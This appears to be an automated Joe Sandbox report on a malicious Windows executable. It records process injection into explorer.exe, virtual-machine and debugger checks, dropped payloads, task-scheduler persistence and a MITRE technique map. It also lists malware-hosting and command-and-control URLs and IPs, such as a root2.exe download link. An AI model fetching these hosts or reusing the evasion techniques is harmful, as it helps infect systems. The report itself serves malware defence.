            Source: Binary string: C:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr
            Source: Binary string: DC:\benejizipica\vexihosibul\fubecilecoz58_wowuceroweman-56\c.pdb source: file.exe, gfgsrbs.1.dr

            Data Obfuscation

            barindex
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack
            Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Roaming\gfgsrbsUnpacked PE file: 4.2.gfgsrbs.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeUnpacked PE file: 5.2.B87E.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 7.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeUnpacked PE file: 12.2.EBC4.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F47 push eax; ret
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402F7D push eax; ret
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00402183 push ecx; iretd
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040B4C1 push ecx; ret
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040FE12 pushfd ; retn 0042h
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F47 push eax; ret
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402F7D push eax; ret
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_00402183 push ecx; iretd
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040B4C1 push ecx; ret
            Source: C:\Users\user\AppData\Roaming\gfgsrbsCode function: 4_2_0040FE12 pushfd ; retn 0042h
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_005002EA push edx; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FD4B6 push 004C035Dh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004705D7 push 00469469h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B4A9B push dword ptr [0050A270h]; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046DB68 push 00468D9Fh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F5B91 push 0046744Ah; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004F7C82 push 004DE9FCh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AFD42 push dword ptr [00509C28h]; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FCD16 push 004C6FD6h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004E0DEB push 004C2A98h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046CE82 push 00469BBCh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B0FC1 push 00469BBCh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_00501FF9 push 004C3C47h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0047E041 push 00468197h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004BE04C push 00469D4Eh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046A04E push 0046624Ah; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004FA045 push 004EF3F6h; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_0046B049 push dword ptr [0050A068h]; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004DC054 push 004C3B4Eh; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AD068 push 0046744Ah; ret
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004AF06F push 00469469h; ret
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to dropped file
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeFile created: C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmpJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B87E.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EBC4.exeJump to dropped file
            Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\gfgsrbsJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
            Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\gfgsrbs:Zone.Identifier read attributes | delete
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Users\user\AppData\Roaming\gfgsrbsKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
            Source: C:\Windows\explorer.exe TID: 5148Thread sleep count: 640 > 30
            Source: C:\Windows\explorer.exe TID: 5112Thread sleep count: 1133 > 30
            Source: C:\Windows\explorer.exe TID: 5112Thread sleep time: -113300s >= -30000s
            Source: C:\Windows\explorer.exe TID: 412Thread sleep count: 1284 > 30
            Source: C:\Windows\explorer.exe TID: 412Thread sleep time: -128400s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4848Thread sleep count: 507 > 30
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep count: 1067 > 30
            Source: C:\Windows\explorer.exe TID: 3836Thread sleep time: -106700s >= -30000s
            Source: C:\Windows\explorer.exe TID: 4136Thread sleep count: 1183 > 30
            Source: C:\Windows\explorer.exe TID: 4136Thread sleep time: -118300s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exe TID: 3004Thread sleep time: -600000s >= -30000s
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\rundll32.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeThread delayed: delay time: 600000
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 640
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1133
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1284
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 507
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1067
            Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1183
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeFile opened: PHYSICALDRIVE0
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeAPI coverage: 7.4 %
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 136000
            Source: C:\Users\user\AppData\Local\Temp\EBC4.exeThread delayed: delay time: 600000
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformation
            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000001.00000000.358870858.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000006
            Source: explorer.exe, 00000001.00000000.380325701.00000000059F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}b
            Source: explorer.exe, 00000001.00000000.329406422.0000000008394000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000001.00000000.360871692.000000000CDC8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: _VMware_SATA_CD00#5&
            Source: explorer.exe, 00000001.00000000.358792757.000000000830B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000000
            Source: explorer.exe, 00000001.00000000.359904103.00000000085A9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: EBC4.exe, 0000000C.00000002.515660942.0000000002E47000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: K,<=;;?9:VMcI;8

            Anti Debugging

            barindex
            Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSystem information queried: CodeIntegrityInformation
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0226092B mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02260D90 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_023E80A3 push dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPort
            Source: C:\Users\user\AppData\Roaming\gfgsrbsProcess queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeFile created: gfgsrbs.1.drJump to dropped file
            Source: C:\Windows\explorer.exeDomain query: thepokeway.nl
            Source: C:\Windows\explorer.exeDomain query: freeshmex.at
            Source: C:\Windows\explorer.exeNetwork Connect: 123.253.32.170 80
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\Desktop\file.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Users\user\AppData\Roaming\gfgsrbsSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
            Source: C:\Users\user\Desktop\file.exeThread created: C:\Windows\explorer.exe EIP: 46319C8
            Source: C:\Users\user\AppData\Roaming\gfgsrbsThread created: unknown EIP: 4A619C8
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Managerzx
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.329316719.000000000834F000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000001.00000000.348621361.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.318266045.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.368523478.00000000009C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progmanath
            Source: explorer.exe, 00000001.00000000.368973876.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.349331442.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.318543749.0000000000E50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Users\user\AppData\Local\Temp\B87E.exeCode function: 5_2_004B544E GetLocalTime,

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 00000001.00000000.373140844.0000000004631000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439850866.00000000007B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389322444.0000000002270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.389380417.0000000002291000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.439945899.00000000022B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            32
            Process Injection
            11
            Masquerading
            1
            Input Capture
            1
            System Time Discovery
            Remote Services1
            Input Capture
            Exfiltration Over Other Network Medium21
            Encrypted Channel
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
            Data Encrypted for Impact
            Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            DLL Side-Loading
            141
            Virtualization/Sandbox Evasion
            LSASS Memory1
            Query Registry
            Remote Desktop Protocol11
            Archive Collected Data
            Exfiltration Over Bluetooth11
            Ingress Tool Transfer
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)32
            Process Injection
            Security Account Manager321
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
            Non-Application Layer Protocol
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
            Hidden Files and Directories
            NTDS141
            Virtualization/Sandbox Evasion
            Distributed Component Object ModelInput CaptureScheduled Transfer124
            Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            Obfuscated Files or Information
            LSA Secrets3
            Process Discovery
            SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Rundll32
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Software Packing
            DCSync14
            System Information Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            DLL Side-Loading
            Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            File Deletion
            /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 753427 Sample: file.exe Startdate: 24/11/2022 Architecture: WINDOWS Score: 100 52 Multi AV Scanner detection for domain / URL 2->52 54 Malicious sample detected (through community Yara rule) 2->54 56 Antivirus detection for URL or domain 2->56 58 5 other signatures 2->58 8 file.exe 2->8         started        11 gfgsrbs 2->11         started        13 EBC4.exe 2->13         started        process3 signatures4 66 Detected unpacking (changes PE section rights) 8->66 68 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 8->68 70 Maps a DLL or memory area into another process 8->70 15 explorer.exe 6 8->15 injected 72 Machine Learning detection for dropped file 11->72 74 Checks if the current machine is a virtual machine (disk enumeration) 11->74 76 Creates a thread in another existing process (thread injection) 11->76 process5 dnsIp6 38 123.253.32.170, 49701, 80 TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvi Malaysia 15->38 40 thepokeway.nl 5.135.247.111, 443, 49715 OVHFR France 15->40 42 8 other IPs or domains 15->42 28 C:\Users\user\AppData\Roaming\gfgsrbs, PE32 15->28 dropped 30 C:\Users\user\AppData\Local\TempBC4.exe, PE32 15->30 dropped 32 C:\Users\user\AppData\Local\Temp\B87E.exe, PE32 15->32 dropped 34 C:\Users\user\...\gfgsrbs:Zone.Identifier, ASCII 15->34 dropped 44 System process connects to network (likely due to code injection or exploit) 15->44 46 Benign windows process drops PE files 15->46 48 Deletes itself after installation 15->48 50 Hides that the sample has been downloaded from the Internet (zone.identifier) 15->50 20 B87E.exe 1 15->20         started        24 EBC4.exe 15->24         started        file7 signatures8 process9 file10 36 C:\Users\user\AppData\Local\...\Tdryuqayh.tmp, PE32 20->36 dropped 60 Detected unpacking (changes PE section rights) 20->60 62 Detected unpacking (overwrites its own PE header) 20->62 64 Machine Learning detection for dropped file 20->64 26 rundll32.exe 1 20->26         started        signatures11 process12

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            file.exe100%Joe Sandbox ML
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\gfgsrbs100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\EBC4.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\B87E.exe100%Joe Sandbox ML
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp24%ReversingLabsWin32.Trojan.Lazy
            C:\Users\user\AppData\Local\Temp\Tdryuqayh.tmp35%VirustotalBrowse
            SourceDetectionScannerLabelLinkDownload
            7.2.EBC4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.B87E.exe.25d0e67.1.unpack100%AviraHEUR/AGEN.1215461Download File
            4.3.gfgsrbs.7b0000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            12.2.EBC4.exe.2d5112c.2.unpack100%AviraTR/Patched.Ren.Gen7Download File
            0.3.file.exe.2270000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.3.B87E.exe.26f0000.0.unpack100%AviraHEUR/AGEN.1215461Download File
            12.2.EBC4.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.gfgsrbs.7a0e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            4.2.gfgsrbs.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.file.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            0.2.file.exe.2260e67.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
            5.2.B87E.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.Gen2Download File
            SourceDetectionScannerLabelLink
            thepokeway.nl5%VirustotalBrowse
            freeshmex.at19%VirustotalBrowse
            SourceDetectionScannerLabelLink
            http://piratia.su/tmp/100%URL Reputationmalware
            http://piratia.su/tmp/100%URL Reputationmalware
            https://thepokeway.nl/upload/index.php0%URL Reputationsafe
            https://thepokeway.nl/upload/index.php0%URL Reputationsafe
            http://cracker.biz/tmp/0%URL Reputationsafe
            http://freeshmex.at/tmp/0%URL Reputationsafe
            http://123.253.32.170/root2.exe0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            thepokeway.nl
            5.135.247.111
            truetrueunknown
            freeshmex.at
            190.140.74.43
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://piratia.su/tmp/true
            • URL Reputation: malware
            • URL Reputation: malware
            unknown
            https://thepokeway.nl/upload/index.phpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://cracker.biz/tmp/true
            • URL Reputation: safe
            unknown
            http://freeshmex.at/tmp/true
            • URL Reputation: safe
            unknown
            http://123.253.32.170/root2.exetrue
            • URL Reputation: safe
            unknown
            http://piratia-life.ru/tmp/false
              high
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              178.31.176.42
              unknownSweden
              2119TELENOR-NEXTELTelenorNorgeASNOfalse
              109.102.255.230
              unknownRomania
              9050RTDBucharestRomaniaROfalse
              5.135.247.111
              thepokeway.nlFrance
              16276OVHFRtrue
              211.40.39.251
              unknownKorea Republic of
              3786LGDACOMLGDACOMCorporationKRfalse
              211.171.233.129
              unknownKorea Republic of
              3786LGDACOMLGDACOMCorporationKRfalse
              123.253.32.170
              unknownMalaysia
              9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvitrue
              95.107.163.44
              unknownAlbania
              47394ASC-AL-ASALfalse
              211.53.230.67
              unknownKorea Republic of
              3786LGDACOMLGDACOMCorporationKRfalse
              190.140.74.43
              freeshmex.atPanama
              18809CableOndaPAtrue
              IP
              192.168.2.1
              Joe Sandbox Version:36.0.0 Rainbow Opal
              Analysis ID:753427
              Start date and time:2022-11-24 20:11:10 +01:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 11m 4s
              Hypervisor based Inspection enabled:false
              Report type:light
              Sample file name:file.exe
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:14
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:2
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Detection:MAL
              Classification:mal100.troj.expl.evad.winEXE@9/5@35/10
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 70.7% (good quality ratio 58.1%)
              • Quality average: 46%
              • Quality standard deviation: 29.6%
              HCA Information:
              • Successful, ratio: 95%
              • Number of executed functions: 0
              • Number of non-executed functions: 0
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240s for rundll32
              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, audiodg.exe, consent.exe, WMIADAP.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
              • HTTP Packets have been reduced
              • TCP Packets have been reduced to 100
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Not all processes where analyzed, report is missing behavior information
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              TimeTypeDescription
              20:13:00Task SchedulerRun new task: Firefox Default Browser Agent 52C9416EC30B0AB4 path: C:\Users\user\AppData\Roaming\gfgsrbs
              20:13:24API Interceptor60x Sleep call for process: rundll32.exe modified
              20:13:39API Interceptor1x Sleep call for process: EBC4.exe modified
              No context
              No context
              No context
              No context
              No context
              Process:C:\Windows\explorer.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:dropped
              Size (bytes):1041408
              Entropy (8bit):7.918015264621188
              Encrypted:false
              SSDEEP:24576:K/J3qfaq1RXzqGA+PF6ZbOQVIZc77oReV2U6JjgtA1/lGaee:K/Ja54TS6ZyQKk7cJjJJlGa
              MD5:1BD9FB4ADE498938E6432D6C5D1E23A5
              SHA1:909ECEC41F837A402EE4EF43D8B9F6B06A5A8AAF
              SHA-256:12B8B5BFDE4092B4248ACCC682098222420EE6A0B6DFE89EB268F7FCF8CF00FB
              SHA-512:EA02AB5EC0BDEABA4E897E5E1E50CCF27AB392AC859348CDF1CAAAF90C7C10F1E99CDD01317F36479CB600B9FE2189F34B59AFC822071EC4C7EA989F8F99CDA5
              Malicious:true
              Antivirus:
              • Antivirus: Joe Sandbox ML, Detection: 100%
              Reputation:low
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......W.................................4................=................Rich...........................PE..L....g.b.....................:0......o............@...........................1.............................................\...d.....1.............................p...............................P<..@............... ............................text............................... ..`.data...../.........................@....rsrc.........1..0..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\explorer.exe
              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
              Category:modified
              Size (bytes):520192
              Entropy (8bit):7.765713315963878
              Encrypted:false
              SSDEEP:6144:5q6OLJ51HLLQrTYeW0w8Y2hm/UchHJ10kiygcz0CkcScVwAjS0bgF8nlctP4:5qJX1H4rUelw4En0V80WSmjWF8nWt
              MD5:F06F222962C48BB7D822AC0FCD14CFD2
              SHA1:0866BE2E6D97E71DEF6DCED9FE5DC7623558DCAD
              SHA-256:F687250C7F49AAFF9787D9202CD13F5E159220D9AE613B335ED72A76FADFA03F
